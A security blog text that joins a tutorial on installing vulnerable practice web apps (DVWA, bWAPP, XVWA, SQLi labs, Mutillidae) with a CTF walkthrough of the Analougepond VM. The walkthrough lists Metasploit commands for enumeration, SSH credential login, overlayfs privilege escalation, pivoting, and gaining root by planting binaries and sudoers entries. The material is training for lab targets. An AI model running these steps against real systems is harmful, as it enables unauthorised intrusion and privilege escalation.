Configure Web Application Penetration Testing Lab

As you know that we have already shown you how to configure web server. Now it’s time to move on to the next step which is the configuration of Web Application in Ubuntu 18. So today we will be learning how can we configure the 5 famous web applications (DVWA, bwapp, XVWA, SQLI, Mutillidae) in our web server for Web Penetration Testing. So, let’s do that.

Table of content

·         Requirement

·         Web application

·         DVWA

·         bWAPP

·         Xvwa

·         Sqli

·         Mutillidae

Requirement-ubuntu 18.0

Web Application

A web application is a remote server software application. In general, web browsers are used through a network, such as internet, to access Web applications. Like a software program running on a desktop or desktop application, the Web-app permits interaction with the user and can be designed for a wide range of applications.

DVWA

Let’s start You should download and configure this web application only within the html directory for all web applications in the browser through localhost. Go to your ubuntu terminal and move inside html directory by running the following command and then download dvwa lab from the given link.

cd /var/www/html

git clone https://github.com/ethicalhack3r/DVWA

After the installation we will go inside the dvwa and there we will find a config folder, now we will move inside the config folder and there we will run the ls command to view all available folder, now here you will see a config.inc.php.dist file. Now as you can see, we have moved config.inc.php.dist file to config.inc.php

cd /dvwa/config

mv config.inc.php.dist config.inc.php

Now open the config file by the following command; where you will find that db user is root and db password is password.

Here you need to make the changes and give access to the ubuntu user as in our case we have written raj as db user and as our ubuntu password is 123 so we have written 123 as db password.

Now we will try to open dvwa lab in the browser by the following URL and click on Create/Reset Database

http://localhost/dvwa/setup.php

Good! We have successfully configured the dvwa lab in ubuntu 18 as we can see that we are welcomed by the login page.

For login we will use the dvwa username which is admin and password which is dvwa password by default.

bWAPP

A buggy web application that is purposely unsafe. Enthusiasts of security, system engineers, developers can find out about Web vulnerabilities and prevent them.

bWAPP prepares you for successful tests and penetration testing. Now we will configure bWAPP lab in Ubuntu 18. First, we will download bWAPP and then we will move inside the Downloads folder and then unzip bWAPP file by the following command-

unzip bWAPP_latest.zip

Now we will move bWAPP into var/www/html by the following command-

mv bWAPP /var/www/html

Now we will edit the config file; so, move inside the config file by the following command and where you can see that db username is root and db password is bug b default.

cd admin

ls

nano setting.php

Now we will make some changes and will set our ubuntu user raj in place of root and set password 123 in place of bug. Save it and then exit the config file.

Now go to your browser and open bWAPP installation file by the following command and click on here as shown in the image below

http://localhost/bWAPP/install.php

Now you will get a login page of bWAPP where we will use the default username which is bee and default password which is bug and you are logged in in bWAPP.

Now you can start working on bWAPP.

When you will login as bee:bug; you will get the portal to test your penetration testing skill.

XVWA

XVWA is poorly coded written in PHP/MYSQL web application that helps security lovers learn security from applications. This application is not advisable online because it is Vulnerable to extremes as the name also suggests. This application should be hosted in a controlled and safe environment where you can improve your skills with the tool of your choice. So, let’s start-

First, we will download XVWA from GitHub; so, go to ubuntu terminal and open the following link to download XVWA lab inside html directory by the following link-

 git clone https://github.com/s4n7h0/xvwa.git

Once it is downloaded, we will open the config file of xvwa by the following command

cd xvwa

nano config.php

Now we ca see that the username of xvwa is root and password is left blank.

Now we will remove the root user from here and we will be using the ubuntu username and password here which is raj:123

Afterwards we will save the file and exit.

Now browse web application through URL-localhost/xvwa and we can see that we are successfully logged in-

SQLI Labs

A laboratory that offers a complete test environment for those interested in acquiring or improving SQL injection skills. Let’s start. First, we will download SQLI lab inside html directory by the following link-

git clone https://github.com/Rinkish/Sqli_Edited_Version

 Once the download is done, we will move sqli labs into var/www/html directory and rename it to sqli. Then go inside the sqli directory where we will find /sqli-connections directory. Here we will run ls command to check the files and we can see that here is file by the name of db-creds.inc

we need to make some changes in the config file by the following command-

cd Sqli_Edited_Version/

ls

mv sqlilabs/ ../sqli

cd sqli

cd sql-connections/

ls

nano db-creds.inc

As we can see that username is given root and password is left blank which we need to modify.

Now here we will set the username and password as raj:123 Now save the file and exit.

Now browse this web application from through this URL: localhost/sqli and click on Setup/reset Databases for labs.

Now the sqli lab is ready to use.

Now a page will open up in your browser which is an indication that we can access different kinds of Sqli challenges

Click on lesson 1 and start the Sqli challenge.

Mutillidae

OWASP Mutillidae is a free open source purposely vulnerable web application providing an enthusiastic goal for web security. It’s a laboratory which provides a complete test environment for those who are interested in SQL injection acquisition or improvement. This is an easy-to-use Web hacking environment designed for laboratories, security lovers, classrooms, CTFs, and vulnerability assessment targets, and has dozens of vulnerabilities and tips to help the user.

So, let’s start by downloading by the clicking on the following link given below-

git clone https://github.com/webpwnized/mutillidae

After the download go inside the mutillidae directory and where you will find a directory /includes, go inside this directory.

Inside this directory we will find database-config.inc file which we need to open by nano command as shown in the image below.

cd mutillidae

cd includes

ls

nano database-config.inc

Now here you will find that username is root and password is mutillidae by default and which we need to change.

Now we will use our ubuntu username and password which is raj:123. Save the changes and then exit

Now we will open this our local browser by the following URL: localhost/mutillidae where we will find an option of reset database. Just click on it to reset the database.

Now you will be redirected to a page which will ask you to click ok to proceed. Here you need to click on ok and you are done with the configuration of mutillidae lab.

So, In this way we can setup our vulnerable web application lab for penetration testing.

Hack the Analougepond VM (CTF Challenge)

Hello friends! Today we are going to take another CTF channeling known as Analougepond which Based on our previous article “SSH pivoting”, if you are aware of ssh pivoting then you can easily breach this vm machine.

The credit for making this vm machine goes to “Knightmare” and it is another boot to root machine where author has hide flag for attacker as the new challenge.

Lets Breach!!!

The target holds 192.168.0.108 as network IP; now using nmap lets find out open ports.

nmap -sT -sU 192.168.0.108

From give image you can check port 22 for SSH, 68 for DHCP and 161 for SNMP are open in target network.

Now let’s enumerate for SNMP enumeration using metasploit

This module allows enumeration of any devices with SNMP protocol support. It supports hardware, software, and network information. The default community used is "public"

use auxiliary/scanner/snmp/snmp_enum

msf auxiliary(snmp_enum) > set rhosts 192.168.0.108

msf auxiliary(snmp_enum) > set threads 5

msf auxiliary(snmp_enum) > exploit

From given image you can read system information, like host IP, hostname, description and etc. you will notice that here I had highlighted contact which contain a name Eric Burdon and location which contains some text “there is a hose in New Orleans they call it………”

Here eric could be a hint for username, now let ask from Google for “there is a hose in New Orleans they call it………”

So when I search for given text in Google, I found that these texts are the lyric of a poem “The House of Rising Sun”. It might be possible that the author knightmare wants to give some password clue through this poem. From given image you can read the highlighted text “the Rising Sun” which could be the password for SSH.

Now let’s enumerate for SSH login using metasploit

This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > set rhost 192.168.0.108

msf auxiliary(ssh_login) > set username eric

msf auxiliary(ssh_login) > set password therisingsun

msf auxiliary(ssh_login) >exploit

As result we had successfully login and obtained command shell session 1of targeted system, more found install version of ubuntu i.e. 14.04.1

If you will search in Google you will come to know that ubuntu 14.04.1 is exploitable to overlayfs privilege escalation.

This module attempts to exploit two different CVEs related to overlayfs. CVE-2015-1328: Ubuntu specific -> 3.13.0-24 (14.04 default) < 3.13.0-55 3.16.0-25 (14.10 default) < 3.16.0-41 3.19.0-18 (15.04 default) < 3.19.0-21 CVE-2015-8660: Ubuntu: 3.19.0-18 < 3.19.0-43 4.2.0-18 < 4.2.0-23 (14.04.1, 15.10) Fedora: < 4.2.8 (vulnerable, un-tested) Red Hat: < 3.10.0-327 (rhel 6, vulnerable, un-tested)

use exploit/linux/local/overlayfs_priv_esc

msf exploit(overlayfs_priv_esc) > set  lhost 192.168.1.105

msf exploit(overlayfs_priv_esc) > set session 1

msf exploit(overlayfs_priv_esc) > exploit -j

This times also we had successfully got command shell session 2 opened of target system.

Now convert command shell (for session 2) into meterpreter shell using following command

Sessions -u 2

This will a new session which session 3 for meterpreter shell

Meterpreter> ls

Meterpreter> cat flag.txt

We have Captured 1^st flag successfully!!

When as check network interface configuration in target system I found a new IP 192.168.122.1 on its 3^rd interface as shown in given image.

This module manages session routing via an existing Meterpreter session. It enables other modules to ‘pivot’ through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list then add routes to them. Default will add a default route so that all TCP/IP traffic not specified in the MSF routing table will be routed through the session when pivoting.

msf > use post/multi/manage/autoroute 

msf post(autoroute) > set subnet 192.168.122.1

msf post(autoroute) > set session 3

msf post(autoroute) > exploit

Meterpreter > arp

Here you can check all IP and MAC address, 192.168.122.2 will be another target.

Enumerate open TCP services by performing a full TCP connect on each port. This does not need administrative privileges on the source machine, which may be useful if pivoting.

use auxiliary/scanner/portscan/tcp

msf auxiliary(tcp) > set rhost 192.168.122.2

msf auxiliary(tcp) > set 1-500

msf auxiliary(tcp) > set thread 10

msf auxiliary(tcp) > exploit

From result we found port 22 is open which used for SSH.

Move inside into meterperer shell then type following command for port forwarding of port 22 into port 8000 as shown below:

Sessions 3

Portfwd add -l 8000 -p 22 -r 192.168.122.2

Now login into SSH server through localhost with forwarded port

Ssh localhost -p 8000

From given image you can read the massage again it is a hint for username as “sandieshaw”; now let ask from Google for his famous song to get some hint for password.

After searching on google we guessed that the password should be sandieshaw’s famous song “puppetonastring”.

Now with this password we connect to sandieshaw through ssh.

After connecting to sandieshaw through ssh we found that we have to root this system.

After looking through the files on this system we found that Puppet is running on this system.

Among those files we find that a puppet file contains instructions to copy spin file in root access after ensuring it is present in the /tmp/ folder of the system.

Then we go into the files folder we found two files one in c language and another an executable file.  Opening the c file, we found it is the code for spinning pipe. Now we replace the c executable file with our file that gives the root access to the system.

The puppet file should execute this as root user and we will get the root shell to server.

We then come back to the meterpreter shell and upload it to the current user eric.

After upload it into the system we compile it and send it to the sandieshaw using ssh.

scp spin sandieshaw@192.168.122.2:/home/sandieshaw

Now we replace the spin file in the /etc/puppet/modules/wiggle/files/ with our spin file.

The spin is replaced, now we have to wait for the puppet file to replace the spin file in /tmp/ with our spin file.

After waiting some time we execute the spin file present in /tmp/ folder.

Now we have the root shell, moving into the /root/protovision folder we found a flag that is in hexadecimal format.

After converting it we found a base64 encoded inverse string.

After reversing the string and decoding it we found that it was a link to a youtube video.

Then we moved on to the other files jim and melvin didn’t had anything significant so we moved to the folder .I_have_you_now. There we found a folder .a, to check how many folders were there inside we searched for all the folders inside with command:

find . -type d

We found that it goes all the way to .z, we move to this location to see its content.

We found two files one in gpg encryption and another readable file then we decode this file using command:

gpg nleeson_key.gpg

This will ask a passphrase, the password is secret which is hinted in the video.

Opening the file we found that it was a private key. So we removed the permissions of the file using:

chmod 600 nleeson_key

Then we look at the content of the other file it displayed a single word joshua.

During our network scan we found another ip 192.168.122.3 that had ssh open but we couldn’t connect to it.

Now we try to connect to it using the private key we found.

After guessing a few users we found that nleeson was the user for the system.

using the key will ask for a passphrase and the password is joshua.

We connected to the system 192.168.122.3. After looking around we couldn’t find anything, so we went back into the root of 192.168.122.2. Here after looking through the files we found that 192.168.122.2 was the puppet server and 192.168.122.3 was the puppet client. We found a file called barringsbank-passwd that held all the username and password of 192.168.122.3.

So we added a new user ignite to this file by opening this file in vim.

Linux uses md5 salt hashes as password so we create an md5 hash using ignite and xyz as salt.

 Then we add our user to sudoers to gain root access.

Then we give our new user permissions same as root.

Then we connect to 192.168.122.3 through ssh and using the username and password we just created.

Now we have to wait some time for the puppet server to update the sudoers, so that our user can have root access.

Then we go to root shell using sudo su.

We move into the root folder and find an image file me.jpeg.

We then copy the image file to eric using ssh.

scp me.jpeg eric@192.168.1.119:/home/eric/

Then we download the file from eric to our local system through metasploit. We go to our meterpreter shell and download the me.jpeg to our system.

meterpreter > cd eric/

meterpreter > download me.jpeg /root/Desktop/

We used to exiftool on this file and found nothing so we performed steganography using steghide.

First we check if there is any file hidden behind this image using command:

steghide --info me.jpeg

The passphrase to this file is reticulatingsplines, I found it after various attempts.

Performing steganography we found a file hidden text file.

We extract the text file using steghide, we use the following command:

steghide extract -sf me.jpeg

It will again ask for an password i.e. reticulatingsplines.

After extracting the file we found that it is encrypted in hexadecimal format.

After converting the file from hexadecimal we found that the text was again encrypted in base64 format.

The text contains recurring gACI phrase that doesn’t allow it to be converted from base64 format.

After removing it we found that the text was inversed after reversing and decoding it we got the final flag.